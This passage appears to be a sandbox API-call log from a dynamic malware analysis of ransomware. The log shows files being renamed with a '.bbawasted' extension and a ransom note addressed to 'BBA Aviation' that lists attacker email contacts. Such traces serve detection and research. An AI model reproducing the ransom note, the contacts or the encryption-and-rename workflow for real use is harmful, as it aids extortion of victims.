lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0161.663] SetEndOfFile (hFile=0x280) returned 1 [0161.666] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.666] CloseHandle (hObject=0x280) returned 1 [0161.668] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0161.668] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a18f8 | out: hHeap=0x660000) returned 1 [0161.668] _aulldvrm () returned 0x0 [0161.668] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef68) returned 1 [0161.669] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0161.669] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0161.669] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 39 [0161.669] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x69e318 [0161.669] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.669] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.669] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef68) returned 1 [0161.670] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0161.670] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0161.670] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0161.673] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.674] SetEndOfFile (hFile=0x280) returned 1 [0161.674] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.674] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.674] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.674] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf.bbawasted")) returned 1 [0161.675] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0161.675] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0161.675] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xe63 [0161.675] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe63) returned 0x630000 [0161.675] CloseHandle (hObject=0x28c) returned 1 [0161.678] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0161.678] CloseHandle (hObject=0x27c) returned 1 [0161.679] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0161.679] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef68) returned 1 [0161.679] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0161.679] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0161.679] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef68) returned 1 [0161.680] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0161.680] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0161.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0161.688] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.688] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]eH0axKjEIsB6oFjKm7p5MkLl5ewEDv2ZQM7vwG5UTB9rrDP6PZN3LgZBGwrCHO09\r\n2a1pjNZDiJCnqA6Jz0mKcIpawUL+fumZ3YJv0weZas0PYRzNYK5nIkzERh6+oOZv\r\nEqeGNb5+yKsINtitKBS/gDRoYdaZe3ONZCQdlQCoM5+vPtJd2as5av3o6Vv0PxX/\r\nuHbkUhMswQpkZc2UaAnVo3DEnM4lumOR4Uea+KzDv8k+g3m7YX7GsHfD1izZKaX6\r\nBcnis0UbbQlnhjJN2hMWw5DMsGb0Gc056/mxvEph+T7tjnSkWNFrNapFGTX8EQ5e\r\nwqg3NivVVjLt9zk3xze8xUC9uuarTzj6IKngsO49g6tK4SnhKeHmc9MtdLfHUuXL\r\ny7gSMe7LytftBoYCjCpgPGQvfVUbOH1MeAq9uvQGm6CHCk2rpIlSDkLg5a8XyTav\r\nRR/x+Z8ZW6zs7ZApaiAY/PrbkhxcE26y63MJ0O2hBXQAY4p6nRxLPSqy4E8Tg9BC\r\nfyvEtkRISfANgKkxmVi/W+TvoP1R7D7Ku+qFhqSRLvjR+rS0bq04Q8tjOZYY2hhs\r\nzYVSytUtS09OmTqyOUJ+NKA2cZyt9ktRzqcBAF0fp5AaRri4Gnlqwbtv6B0VFZXO\r\nSgRb95r/XqxTllO78CJUn/GYUMALa6O1t4P2s1b3kYj=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.688] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0161.688] SetEndOfFile (hFile=0x280) returned 1 [0161.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.691] CloseHandle (hObject=0x280) returned 1 [0161.754] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0161.755] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2d20 | out: hHeap=0x660000) returned 1 [0161.755] _aulldvrm () returned 0x0 [0161.755] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef68) returned 1 [0161.755] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0161.755] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0161.755] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 48 [0161.755] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0161.755] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.755] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.756] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef68) returned 1 [0161.756] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0161.756] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0161.756] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0161.757] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.758] SetEndOfFile (hFile=0x280) returned 1 [0161.758] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.759] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.759] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.759] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml.bbawasted")) returned 1 [0161.759] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0161.759] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0161.760] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x13b62 [0161.760] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13b62) returned 0x630000 [0161.760] CloseHandle (hObject=0x290) returned 1 [0161.828] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0161.829] CloseHandle (hObject=0x27c) returned 1 [0161.829] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0161.829] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0161.829] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0161.829] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.829] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0161.830] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0161.830] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0161.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.841] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]HURnpqPU6mJfVOT+dRFft8NgglUoGJucaOGo6zbCybPl3JyRWF23/En+483McwzP\r\noY1X48BtGoje914048QHECRIIzkig3AF5/6NI+WbQwreANvPYJ9WYsMypWIDCiim\r\nO+MHuv1aGkbpJTZI4gcAUy93JfelKQhPTtC5J32F97VXU3Zyuy+MruiusmcUa+wB\r\nLnxtl7g2FQphhCRDU6zk3ORp9qUXQH9pGso+ECXnjkgxlSmgePifGfjqMzX2/3qd\r\nuhmKlLDjsjAeVR8NAUf7PTvoLQL1YScC9b+YMgA9s51l35KDPGJ3LJzCLh8K3RkK\r\nGmuWll6CvHLDtHDOF3WRHHsws12h+lPX1r4HebNLI4wc0oigWBHGjR7rFcvPut+h\r\nr66EVT1UOG6BsBkzq32SHmlHzXKeZ1fO59CbM5zOXEKoxGNM+/IC7tuar8Mvfk3e\r\nqEP/d3gfsiGekPu/XeC++bmy2gpF3Xez1JXnZVFLrjpf/oJnKbZZ6p6Uvv7I/rib\r\nwh+ax0p3Hp3VLMgXU5fo3Ig97LRZFUYA6MQbuoUAeWnrlSlfTp3ZGCIwMaeR/Q8S\r\n8jY+kANqBHCcpbIN8ftT2OLvcdQI3BEoR2YtD813ekShHcb6cuP4tQV6HYV64Rmh\r\nIls55HccnoC2vi6tcU924VLjnRSzAFQ60mFb9TyWjSW=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.841] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0161.841] SetEndOfFile (hFile=0x280) returned 1 [0161.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.844] CloseHandle (hObject=0x280) returned 1 [0161.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0161.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1d78 | out: hHeap=0x660000) returned 1 [0161.846] _aulldvrm () returned 0x0 [0161.846] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0161.847] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0161.847] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.847] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 48 [0161.847] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0161.847] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.847] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.847] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0161.847] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0161.847] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.847] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0161.848] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.849] SetEndOfFile (hFile=0x280) returned 1 [0161.849] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.850] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.850] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml.bbawasted")) returned 1 [0161.851] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0161.851] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0161.851] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x13e4a [0161.851] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13e4a) returned 0x630000 [0161.851] CloseHandle (hObject=0x27c) returned 1 [0161.935] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0161.935] CloseHandle (hObject=0x28c) returned 1 [0161.935] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0161.935] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0161.936] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0161.936] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.936] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0161.937] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0161.937] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0161.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.946] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]lqOdhuI78eIPD4awNBwT6oWEOZgq0+uOBzvfw3LnuJ9YcPNGSfi0NgQ0h3EcEs9h\r\nKy1ZcrLnxnfCHWK1P3g3TlHSg7MV+YJqaIKI5CQTNyrI86sQ2hhBiqqsJwbtFGr6\r\nwwFwSba8VEXNN0sa41rx9m2jIhkiXNmMMqYahjpKBdxFuTtbBfuArV0qZREJRBfW\r\nFllXRWHxkxJIbRDnjK1xD/rpTYWGAjtmVxZ/h1JXY7P5lF/cpgr6xwgFxd3Uq6H/\r\nIQPaQ9XkCKiTaeGdoIPWLloe6r9J3hXet/1CdJ/lkxwzhrjUYlwzvQ1N218RhhFs\r\nBQT6ltE2/jl+fDU5WaQoBxSa0zhyZz0iIdr0skLfTZ2G8c5gmJxGh8629A8loDOp\r\nSGsm9QFMNmmUpJQkyyn1Fja2TgX7PfmR3ecwkNhqK7OKWvNurL+gDSZ1jEgQV47D\r\nAIkKX33SoSsNg33BVDRcXHPPVbDSo3FduddRjfQrzO+vjzAuuqSmbpKW4zUFb6s8\r\nuEyPS29HMtK5j/kVrQv+JW4fE8cCl7YzUN4VjGNPJAtwhtzwUm/3msBeNkUKxnfw\r\n2dFRaNTD6o4XNaMRizBaPW/5ZhwYxO13vsCY98HwIp43sJSCWgMCYLJDcYA504I5\r\nKpOJ47u0iCMGy2M2ZpNd/C1DYQcmcoWFdvGZmjl72zZ=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.946] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0161.946] SetEndOfFile (hFile=0x280) returned 1 [0161.948] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.948] CloseHandle (hObject=0x280) returned 1 [0161.959] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0161.960] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a19b8 | out: hHeap=0x660000) returned 1 [0161.960] _aulldvrm () returned 0x0 [0161.960] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0161.960] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0161.960] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.960] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 48 [0161.960] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0161.960] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.960] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.961] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0161.961] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0161.961] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.961] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0161.962] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.964] SetEndOfFile (hFile=0x280) returned 1 [0161.964] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.964] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.964] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml.bbawasted")) returned 1 [0161.965] CreateFileW 